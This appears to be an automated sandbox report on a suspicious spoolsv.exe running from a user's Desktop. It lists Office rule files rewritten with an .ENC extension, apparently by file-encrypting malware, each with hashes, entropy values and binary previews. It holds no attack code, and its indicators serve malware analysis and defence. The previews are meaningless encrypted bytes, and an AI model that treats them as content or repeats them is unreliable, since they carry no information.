                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...IV/C3....;..x....>.+Cj.....t.......sa.*i...(.].H..)..J...a...X..EF.(.a.p..,l.....-z(.e....S.....[.F-.-{5..)....s~.......&...*....4..c....u[j..<.u...y.].UV...,....f.W...J..~....%......d....+..}..h.......g.....4.+?{`.A5.+. ....;p...Az.s.a..,.k.....nU.Q...v.....h.Ic..~..D.j.]...W...Y5.G....e.4{.q...G4u>2...e...9..#.yh.(..?....;:..p.e..?..N.%Ah.Z..j...VL....3..,...q.h.>7f......T.N.O.Y.8..t.BE.....-.m&...(,.%I~;...I..t...wrr..N.....Q.....5A.h.......k...d.w.@.!....m7.....c.9Q?...D.D.K...FPe.H,...#.!do.&##.Ll...A."....Z..[....|..7.y....8w....w..S...Uz>......b1..S....D{.....m........b..>....\..P7..Pn..w@...:....n..8.S....0...&..b..:e..4..^..B1...x....~....O..f-7o.l..weyu...ob.;_c.."..m.1.M..W..Fy......&..E..).,..KBeT....J..Q=|....C..&n.|....\...}.T_..S.......S..u.....+F.:\=..b..s.O...EY..#......-...V.P..-....^k.6m..J..a.Y.z..5..o.!k4..ElKcx.....k..Ms.tZ..y...V*..>cC....S..'.Q].....J...4.2

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230164v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):864
                                                                                                                                                                                                                                                      Entropy (8bit):7.7925230732855395
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+hXxpiCdzSF6vC3IkUjzeyCX9NlcQc6O3uB:+hXDpdz26vVkU/bsK6O3k
                                                                                                                                                                                                                                                      MD5:E538DF2CAA611612C33B5CB6D0EAC65E
                                                                                                                                                                                                                                                      SHA1:77E81A0E7C32F0ABF71C0411C3C62DE4D9977FC3
                                                                                                                                                                                                                                                      SHA-256:18317AD412F916013B288351A9C91EDDD61864545056AB011FE38F4CC0D38291
                                                                                                                                                                                                                                                      SHA-512:381FC8522EF7D03E62840EE7218E4450B0D9A9D60F69214B155EB562098AEC74AAA7520B6D496F748072BCFC626681C711359E95971374CABFB15B8B370D6BA9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I#*1!2z7.l....03E.}.=....d@.t....)....;:....h...../..(.7-Q.p.C%....dy@mP[...8\."Gs3o..{..D.D...Z...^..K..&+!.o.m.x.Z..di.....t__.?.....q.=U.#-...p..B...t.p!0........1YU.}..R+.u.Tp...K......2...-.F..H...]L............6.E .+..7...@D..-..J..g....".....Y.n....k>.w?...fg{.]......N-.....e.S....I..`"'....8F..d.. ....q....p..M.l..R."X.r.....s(..XB....U...A/z....ND...z.L...$._$.O'..je.t......{.O......B.../..+.2{.1^..b.k....o._..h8.3x..A.'..2.n..l...7D.a..3l....-=1..0..tk.....2;X..AG.T...B.d,.yW:.%....... ........LDF..z.p...}.3......oT.....%.xiK.....=H...bl.....U...4.~&..,q....=.'t*\a...1WXVpc..... ...&.w...!....D.....(Akf<...w.....R>".*.......[..[.pd:j..Gv=1Tz.....Rq.X......r"...X.P...VP3....:....1..j%..2...%..+!n........H..>...n%..A.]d..4y_..![.7.q....w..FA?'...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230165v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):864
                                                                                                                                                                                                                                                      Entropy (8bit):7.754110317810805
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+uY+dMUCMNK6qkDfB4PIselAwv4lYZzwgD:+uY+mJMNhf+clAwv4lYN
                                                                                                                                                                                                                                                      MD5:3BF8B339C084BC9F0318003B7526B31B
                                                                                                                                                                                                                                                      SHA1:D35DB4B8FA7135ADD78754769389A78E360CC450
                                                                                                                                                                                                                                                      SHA-256:481CA435876398AE11403051D53BB745A4CD87519960616A84C9BBE2558E97F7
                                                                                                                                                                                                                                                      SHA-512:A808CFD209BA85749B91F58F5A91B1BD65A5BDE57FBFAE6D923EBCE545304AB7893DB536790899CE8DD0CA9D58C18226A99B90BF242DDCDF9707E1BA41D975BC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I-x..k.nE.FWPA...u..Sg..?dqM.+.I~....+...R4...I.B.xu(.dn]Wv9...... ./...].E.7....W{...YNq....h..V......cjN?.K.A..:.sUk....~<}......U.K.5Ci.......A.tM...PU...A...n.T>.[..E....Q.%....P..-4...0.F.....tzw`..<B...2.v.n.1..J..\b.1...gwA...q].7...?........V.....9...2.u.......:.S..iv../y9.q...O...u.......8P.!....^..z.j.6.....`..*6.....2.|e.g.".0.....[..B./...........E)j..Q.i..$..O7e.<..#D.m...c1.....0dmrvGJ..5.=v....&.>(H.Is.....Z..........|....Za....m2H8f......v..i...e..p..Qzjg...i..Q..u..*...Grg!..E..(.x.m..%.@\P....-.Tt.i.7....F...s.Ms0nK..W.u.3...A"..`..vLOV.....c..!;U.[.4..g........b..Z.F...+nr...b.B..4..d].....}.....2.+.G..Z.........L.!{..N8.M46f..w...e......X.. ..5....vL..-..e.23..T]...Jq.4'!|/..G.....[.d.A'Bb..O.......{.u.r..|.9....g...U..A....k#.:..|...e:.kv.V..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230166v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):768
                                                                                                                                                                                                                                                      Entropy (8bit):7.7056419576406965
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmzmr2NEYwPvHlRKARDpTo2OGDBXGOFixUmwbuhtC8fRLVFeW8a6D0+voO:+ze+wHHlzRo5GsOcDXZSWOD1QO
                                                                                                                                                                                                                                                      MD5:EE06A1EBB8118152F15C6F6AD940D36B
                                                                                                                                                                                                                                                      SHA1:24EA487DC722CF9089919DCCCDFC7A185D80AEA7
                                                                                                                                                                                                                                                      SHA-256:546ED49873A4B907EA5FA4C07099B8749373151B1004E80291DB309D414D4181
                                                                                                                                                                                                                                                      SHA-512:7BE0C48D5E21E683E66577D6F503C5BEE919A851A2F72BCA0A9FD5E01D9D10496BAB119DBD2DA5BC05529CBB49680AE944D1C26E72F6826421C02FC1D6E5D69B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I.B....4...X..@.!.<...7.....!f.tD...f..Jdl..S.../..C....C....i....{<G..m.....H.F.. ...EOL.na.bD'..g..B....W@...a~.&..s.1&...,_.....U..n#..Y.1..zm./w.1.....C.aj.1M*...9v!...s.'zu..4..k...zp.B.o..AN1..g.Yh...rJ........:....MvB.>...u|U..].H....mM..L.V]..."...Sz.^..b...../.'...."....]j.a.... ?..4i!6...._m.a..B..[e<.R.`.O#....k....._.Sk.v..>.[....[L..Am..x.:.`=/...I..z..e....Gk..v....h{...Ey...n:d.jq...k4.1BHO.r..qL...qr..[.>X._.w...Z...x..!.....:4..F....[..N.q..G\.%B...`.1.......$'f.QLVK..s^..:......Ob.".`. .Dy.*.=.~.....;3.H.6o..mn.'.}o....2.PS.;...fx...M.<+N(..]....._.....o.'.8...L..B=m.....X.7?....M3NP..:"n.xF..J.....Zj...51..'y.i.U9;.o..yU........L..........2}v.`..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230167v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.865334726944223
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+xNJGj74gwJ6C/4H8tMAarLlbmkxFWdVI98IzcjEa49g:+0jsSC/4cSJHxUdVi0E19g
                                                                                                                                                                                                                                                      MD5:7140581E8D4378C46C0227BD27101EA0
                                                                                                                                                                                                                                                      SHA1:9DE2C17F146A803B3D38CB20456724F41A5B01BC
                                                                                                                                                                                                                                                      SHA-256:09F6D2858EB0D1C4B7411B59B1E6F3DA85BC6502F297CC301569B00257E6FBFF
                                                                                                                                                                                                                                                      SHA-512:F01F102D188F2BA8568E476F111619D3875A9536F96099C1A8072CA4D306BE9D919EAD1034DE86078D3AF32A564373F2A18C17BD1E6DF950AE938892D3CAC468
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I....;.Y...".]...i.J]..)".W.....9~q............(B".B'.y.Y.....-5/..*_..2P.....|9......-.F.V....H......o=uNy...*.!+.K|....jB.p l......3.g.e.}OW._.&..b....245... .8.F.=..l(Z.aGW.|E....^<..||\LWwG..V:$g#R~.C.q.M1'..8".....V!|$V.?.:=*.`x.k...m2..I..O......<].....@*..I..{..D..9'#Ap1..0%..)....d.......R......!..d.KC....e.0......D...K....../Vf`....%F.c........~.S ..+...`..k......Jv=...P.x.%].fP..........#....w.....A..,.QA3.>/..............G.#...Lx......._fQb..bEI...y....pV..I.g\..(.#..k(.FZ....~..>.....oa..g\..>.....*.Zw....m.3....e..L.x..A.....O>KY.?.)..{.8}.>f.0].7.c......V..E.....{......uf.....d/S......v.....&..B@.@K.....&.4.i).v.p..-\6."....t.......47VM.....#.........V$.`..+..tG.^+a......<r..-......Ws....#.3*.....SyA..l.I...}....e....=3.-..y.j...Wf..C.....N.KT.e...z...W..0J...R#....0...\?.k..eb..i}Y7.2..w~...T..E..b*6Kjm..l.D~\...*& @..5&.@.....\..0vR....s.b...7........`Qo.0NX.>.sQ..}....g

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230168v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3120
                                                                                                                                                                                                                                                      Entropy (8bit):7.948620341537494
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:+xZBiV6LL5MSBc2JrNwLRlhgfWjJznvKmDI0EX0ZsZMz/YFCUGZ6nQ8i:+xZBiV62O9JcRlhgfWV7RM0aaEFkZH
                                                                                                                                                                                                                                                      MD5:BEE36912A3C387CB32F08BD69FE04A89
                                                                                                                                                                                                                                                      SHA1:8A9E1C67F44DB2615C951F739222E7CB4F1CD508
                                                                                                                                                                                                                                                      SHA-256:FD4F7B265D1E966A53D490429E877B1BE7A7740B3D49BFE1A3C829A2DE9FB43B
                                                                                                                                                                                                                                                      SHA-512:7A629F6D47D72C31C539B4A9767A8497D809C637A8F8C67A310A34F1D42C19EA305C767BE37B32B90C026B43A9F7B13877E90937C8E6DC1D24F139F75A776ADE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I\RS.../.*.x[.&.b.(y>w.q=o..pt6._...H.!.b..&.K....i@6.S.P.;..g.3?....o..f....G..e8..gV..o....7hX+...|.....(.(.N....%K..)).R.c..vqn |h.%P]P}...\.*.V.:.,......^p...8..a._u..}..:.>.HXu...Z....?...7..l..w!.....]..(W.....gi...46.....-.....B..VO9xa.Y..].b.a#S.`..q.:7c..tMI~.eve.T<.Iv.n......_C....Y53jh..).[gR..t.b...h`...Y.v..P..(..P(M.....uu..H.N..u...7.$..!.FJpY.L.....K.<.......>y-...+.....j..pB'.?$B..k...$V...........5...w./.:........L......|}.3.^k.F..XV.....E.6.W,.L....M..* ...1..~.......}2X...E.t...{...bK..I%.G.+'.....p....0..;u..).ee..1.l.-.........O.].t.w.>.7.......PHu.f.T....-#.....^.....C&T.2n...4@..0yD2......<....[..8i. .n..V..W.kaL...G..q.WB,\.d:....l.......B_1h.`.t..M..x.s."22Jku..A..T......<.. ..[.P~,.......*8...j....3.r?Bi.F......[f..Q._(...l.]=B..0.eS...p...M..rE[g'.p.zV.Vy|.*...].E.....w/~6l....`....k(c..gl...E3..E..#{..e...CW..[wlY.[..L..G...@.M5..hX...._$.~.v...t..........\W.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230169v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):7408
                                                                                                                                                                                                                                                      Entropy (8bit):7.975523784500929
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:+l31qFQVH1GKu91n3zdnD8Cb9qhEzbf26JK1CLdgSXONqxP+STHlwGeBgqUjUeWK:+llEFjxD8ikhSbf26YCLdFoqtbeBxUsK
                                                                                                                                                                                                                                                      MD5:C139396D1D3214D0E7872957069E7FE6
                                                                                                                                                                                                                                                      SHA1:72F307E08CB6F4CFF64D2454F4E7872848B1569E
                                                                                                                                                                                                                                                      SHA-256:3D2B4C6DB82E1F1782FECD503C9623A0004ABB13E5C59C9B04136AE4B1DC88A6
                                                                                                                                                                                                                                                      SHA-512:56D8441F3BD893B6343B2109AA369BC0BBD64785EB15D455E24D7610A0A184020951CE130B4B23B3BD0986643BF56CDAF797E18080FA35F138502D79D3AE58D4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I./8x.<.....R(..J?.2>..s(.2....E5....~lPN"J.6.Y.....&...7...W..TcG...l.mR.G...I..r..V....z..n(..F.k...b..2.......1...7eLf.&.8....1y..m...XoI.<-.~..%..]...D.U.+..{..R...Wy......7...3.G..p.bgx2.]Y...:.4a...D......(2.*..J..Le.E.^WH............Z...n7...M..B..la.......s...J...m+..m6L.g%..K.'m ..'.w.vT.<.....<g~#....^..S:.9@..Kq.:...p.~f......i/..5.L.P........3..*3..g...%...n....+%.!Gj...l$.3..6.W..n......%)i.L..C..PC.6C. ...\.....S-..K.HPr&.B-F.G5.......:IS..j.1>F$.pA... Q....R.(.....f8.{...<.w.N.|...wAx9.INS/....D....t..e..r...fM>g..z...bk.a%.[.&UX.R.gqX..GC5....U..._..o...9.FH.'..+..'C1."...E..msd..8)....$[.b..%a..A~..|..0..C.H..((....g7..Dv...N...n5...!(,.i:.].!YH..S..u.h.......W.<Q..,G.Go_j .9..;..E;..NZ.<1....a-...3..g.u..M..9..0...8.B.GE..\.f.#ZS.C..x./Xq~......3...g,....0.....Sk..w_...k.G..J~..tx.....?.Q....m...9"JAH.....!z.e.^..Jk..1X..A($..%..c.g..<}KX..5.{..("..F..Pr.@...q.e..M..~w:..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230170v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):23632
                                                                                                                                                                                                                                                      Entropy (8bit):7.991577106351931
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:384:Bf6RvPvxyciGk2e/qDFEb90n70oR3mPyoODfYgYqwpRYO3ewR2hmuYb/iy:BwvPIciF2eyDS9OxxmPDOzfYqqpewQYR
                                                                                                                                                                                                                                                      MD5:D45A5BC4C04C54F119B28B59535BAFAA
                                                                                                                                                                                                                                                      SHA1:B2F00558F18A90C8388AFD5C2D410419D1F678C6
                                                                                                                                                                                                                                                      SHA-256:484BF184169245BD12662DBE3B4AD732148F9A4B1C46BF1BC35C30849CA2AFF1
                                                                                                                                                                                                                                                      SHA-512:7D10A5B4C26D8DA960EF2A87277C7FD8A1FFD94367A5DE7F6A61A4C77E26EFB4B82A07975FBE17643500E421DEC2C029785DF4516F2603D00487C409D615EFFC
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I....)....4..on.1..CB.1V.u.....}.{<j!?C..e*...>...?........~.$H.T.}...l.6_..B.!.4qh.../...0.......O.h...cCXC.=.j..W.YSQK...kB._.......M.N...'...s.M....MGa...G.N[......>...[Xi."Z.W=J...].M&.:..{.N..'B..91AN]..7t.....2.''.Z....l1fa(s]...2H..'..n0.NK5dT3%.~.<}.....a.o+G.u...P.(0G...Fn.A....b.p....K.....fjRub....R.Y......7A.#.T..['5..~N.0.g.*b..X..N.........(...T.U.T..P..2..]+Z\...-..y...S.....$.u.u9..7.0.&....E...(C...J.... .'V.T..c..!g.K....U.av..._......U....q.W..q...T...]ew.."R:^..'..........B.e8.P.l...y...pe'b...7..u.GiT..k.a._g.X..|..E.j..'Q..(dS-o..8..6.....>/.V...9|u...v..<.!.........\.<..O..n..A..Q..h...M;/..._....[......_.....C.6."d.hYn.........2..Z....X[.?.5....0e..z...{%..7e..}/.W...*..j.z..B.}..D<.1....N..b...w...".m......z.;...:[...;..n.X.s.....z.U..8!C...E$s*..$...(...4J...*.^.*....W,)...C..n..6!....j...N.N3..#3.U.."G.._.=....v...;1.0...K..ss9..uM;3.J}Py.o.....)..P..D...O

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230171v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1440
                                                                                                                                                                                                                                                      Entropy (8bit):7.860453905702294
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+1XjcNYUCk0TXTb/I3tOBi5QwA6jpqHP7+l161y+dmpQXy9fxWrn0dZaY051vPD:+1zgYUWTDT8OBihjpyj+lWa9fxG0dZAX
                                                                                                                                                                                                                                                      MD5:8AA545BD6C6B116BB9B194F7ED596234
                                                                                                                                                                                                                                                      SHA1:4C3E532A8134C67DD34C2BF910B8B44BE5E916FB
                                                                                                                                                                                                                                                      SHA-256:B6189BEEDCD0796C9935787C47EA8C45E88DF3881F7FECD20D851E0A1AADF454
                                                                                                                                                                                                                                                      SHA-512:00B42CA496A89B4646C98B8DDDD4269A2D724BAAB006AF0213FC14A9E25C46B4312F2B8BE210BD2CFC315747BAE5009EDF3A592FEE41469A6CBF2D345EFEE4B4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I...i(.[.y%...;.6.... ...}W.7.Qj} j....Z..t..j..M'y.K2j....%.).S...F]...[.j...U[J..K2.S.S\.....K.u<.(!.5........n.FL....E.l.^....aS..s..8..............BOR.@.r.e.<.....(.1.Rg.)..."&...TG.I.......vr......thz.k.&............Ms...F).D.%...|O<Y.me..R.^.+.b.].C..........i.>1$.4.4..RyakTLs..c..i.W.0.}...r...f.q....v...r.f.g..._..6...[>.<b...e..V........gR....q.....,%.....}../.^...]G..'....k.G..b..w+...j<....y.%{..m4.~PM....x......Z..w..6.D...OjN.x...Bt.........T...e_.EO<j1D'.....Fx@5F....M4;.\{.i......._@g.zB...O.....R.t..1..n.#..o:d(..U......\\k.{.`...U.pk>.G..Yu}0...c..et...... ..&.z....(e}..9..&t?..o.o}...d..5.M..}&...p....`T.6.l.8(9.n...A........z...a 0.Sq.B..]W/y.4..@@...Q6E.......Y..[.L.!.2.RD....~u.:~a_.HQ..../j..;l#..sh..)...H.......Tl+.D.....4M.u..rt...H...~....W.r..?...pY*.....fH...l.......-.........,...[]..o..1.FV.........>\.#Cs#.`....-tq.B.Q>q.......'..Y%..D4......XOxy...WCCp...K.....g

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230172v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):31424
                                                                                                                                                                                                                                                      Entropy (8bit):7.993884155994469
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:768:jLH5Uefa0KcZPyCwShlb1UQDQ+4MeJSv1Jv863D0OOIDHFZB:vZU6XVF1PDQ8eE06zaIDHB
                                                                                                                                                                                                                                                      MD5:7FB38491425E468E05EBB2F33915684B
                                                                                                                                                                                                                                                      SHA1:1685D5C74232380F6AE3FE4BE356DB24EBED6071
                                                                                                                                                                                                                                                      SHA-256:6F8A08A750E758451BD60E397E50A8E7D9FFE6F04FAFA83749DE313CA6E3A9FF
                                                                                                                                                                                                                                                      SHA-512:EFE5AA30624F94FEC78A151E6A132547D0A303248AFA2E6468F2B4AFD64F9370D8AE48A458181D5E3E1325FE6B2F0E53670C4D5AC5444234CCDD7DD5E03E4CC8
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I...&i@.c...7..P%..9.y..{..$..~....*...M..vo.....K.y.....oM.....$...s..#m.wF(...v+...x3MsiE........2`...)..........M.}.u...._...j7O5`y..u.S...+.i..`D.....E.V8....W.\M.q......$%......1<..e.J.d.j.=.5.YB..OJ..A.=... ..3..R.+....B..)..Dnti.E.K...~7.. $fy.....a.._.m.F.SR..M&.q.....z...s#...../......E!.s%<.a.......x...3.`........$9Zr.....&...6.y..j..9.9X..G...'..;.8i..G...*s.t...O#Wv...H..B@...[..2~.....c!D.....a.....W.e...mO{[....@..S.xO.W...3U..u}.*+u.U.q......Q.H.......|6....k...W1.xQ......M....V..p.E...I7.*..p...f]7.QN...D..-.e.....%"c..)...V..d.?"+..Zkr{.\..L.T..,....O11.F.Ek2.~....@.M...dvf.Y..F.s.d.lWS....\J...]...].....h....+..5......p............!K3W.bq."..wW..V..C...?.Y.X...:Pp..3,..........D..S.@.R..g..n......u.......v...(.U.M...m.dV&.E....^../c...JJ.c.....3.^...\\..Z...|...R].....l...e../._..-......xns...Kq4t..z..=..o`..,...k1O...F.%`..>Ke.>.'...gk..2..bb~.Z...'...h.z....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230173v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6048
                                                                                                                                                                                                                                                      Entropy (8bit):7.97232648384762
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:+9q4fdfCPidfENhgQIyARYx5JS/PE8aFoFtD/urTRDRrc+44PSFk4DDWQb3rZN:+wQdfCqdfEvgpyACcjeOtDGrTRdE4POT
                                                                                                                                                                                                                                                      MD5:4862A8B63EC9911B91A2DDE48EFD22F1
                                                                                                                                                                                                                                                      SHA1:42C07110D841B32444F333D4BA921C41EFE7EFCD
                                                                                                                                                                                                                                                      SHA-256:4B96AF17A4EAE0A516F3494C6BF53137DD0242655BA41DAD4CD7C66407381467
                                                                                                                                                                                                                                                      SHA-512:097AB6BD654BE1B3516C5E52BA010B06BDD86E2AE9F96326506AB1FA4322496EB0CFC6EE7E4C1132AF5158BE9D5E078B3DED586D72DC4F3000E2875483C843D1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I.yc....S.....'..E.....W...c=....p..u........zG..(Z.\~..`$.XE%.'...H......3.@.o...#.p.W...~.PY....^.J.#.....Oc.YI..&^...b.....M.!l..4."..8...\-ga...$._....j...7*.GI.....U..ki/..I.....=.A.o.....=S..j.j.L....v.[......Q..J...e..e. {@.......1}.'..<.......P.S5....n....q......].^5....z.Wu..J......$b|......\.w..L..K..>(z.a}....B.:..u....."..U.Qk..U.>m...u......|l....b..`Q5...cA%.`.3..}..j.;.s.B....u........n.S.(.E...B..Kl...s.....g......(_..U.mR..s.,.].7.....i(..Z'3rl..:.S.O..._u..f.Y..p-.x.....B!...q(......h)G..S......(...~.C/...R.....X....5.Xt.. Ow.;/H.W..?..L.....'.|X`.q..mFq......J..|%.......`...D.........Y.].=.-.Ptl...j.IA....q[p.o...KO.)s.Y.6.N.,b......q...*...hv...7...C.Q.J....<P.,.cSe.U....>..^..U.[r.........o.......5U.....".L.K .}.XL.r.W.c.......m.......x.`d..!..w.T...}.R.....Kus].DZ_(#..g.., *...H.[8.}.jn..D.e...w....]......Xr.....Qm.._....l.b...X>Y+..R.b..dl.Z-..E_J......m......1|.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230174v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2160
                                                                                                                                                                                                                                                      Entropy (8bit):7.9034670212677955
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:+YWmon7hndLRUp03z8t5/mdAn6gGYZJ2IYdXQjo2OVqY7Oe:+YluNdLRaoQz0rYL+g3MOe
                                                                                                                                                                                                                                                      MD5:6755572186F6D45AB0ADDFA6B1AEE3D4
                                                                                                                                                                                                                                                      SHA1:D8730C915980237D1FD5402B45607DB540FF4AA6
                                                                                                                                                                                                                                                      SHA-256:7F182F1C84306966CCD99917AD4AC02FCB48F7163826EBFAB28A9D4DFA1D421E
                                                                                                                                                                                                                                                      SHA-512:DA49356A046D3199BC9E2849221FDC4B743ED4557DE0905DEDB4AFE177AF861688F10D4224733496730416F8BEDF93F085F92F58EAF83F11248903FFF963982A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I.09O...h...<..{...Z..p.#.+.d\..:....M".E![N...51.W..m...]..........p. ".a..r ..#..c&..?J.^..d,.X...R.m..O..M...8..kd....8..)?.. .....r...LS..h.3.+t-C{.K...%.j......;.mmIN.s....).Ig.r<..\......v.4.i.....k.D.../..3......E.....uR...l.9..#.F9.Y.@y.........18[..e...[.;JA..O...<..7.V...#D....%...f"..;.....MV......./...g..}r...B.0.S..^..0....l<...7YWWq..F.m.....n...Vo.).. ...$e..?.jO%D.9....34..r.HGS?....ec}".....`6...^$....z.)...V...~#`..-t.hk...dVS.....#.-..0.c\ ..=...,6A....)...%:.<\3....m. ..P4.Y9j.._.e.}...nV*.@i;$..u.Z+*.A.....\.!B....Oi~..B.....g..#.'..r......@.z.Y$..}...k....}..<.?d1S.\e&..q.\.D~...P..33.`^u`..^.A..Kw.,I.q.W......h....x....z.n...P2U....-..k'...1...g[....{:~7e.;[?....o....U9'....;N...D.a*...o....~c`.......e3...*#.....qx..`...o.T5..&f.F8B1... *..`=..9WCef.$.....s.gd[w.[./!.).y...PMy}.hX.D....NE;f..t..T..).(..7.d.x.y ..2....`......g........`1..........*&s.`_..+x.^...Sr.~0

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230200v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1472
                                                                                                                                                                                                                                                      Entropy (8bit):7.8684441558847
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+hvvo1Y/00hJflKqxSHrzXO58DCULSEx6LcrcAeozmVtMCtKfrU:+t6f0XlKqxsrS5WCYBTmfb
                                                                                                                                                                                                                                                      MD5:FFF9DE57D6C240FC9C56FAD8A58E726A
                                                                                                                                                                                                                                                      SHA1:D528DD1CF653CBAFDCC9EFE1614DB7484319BFA0
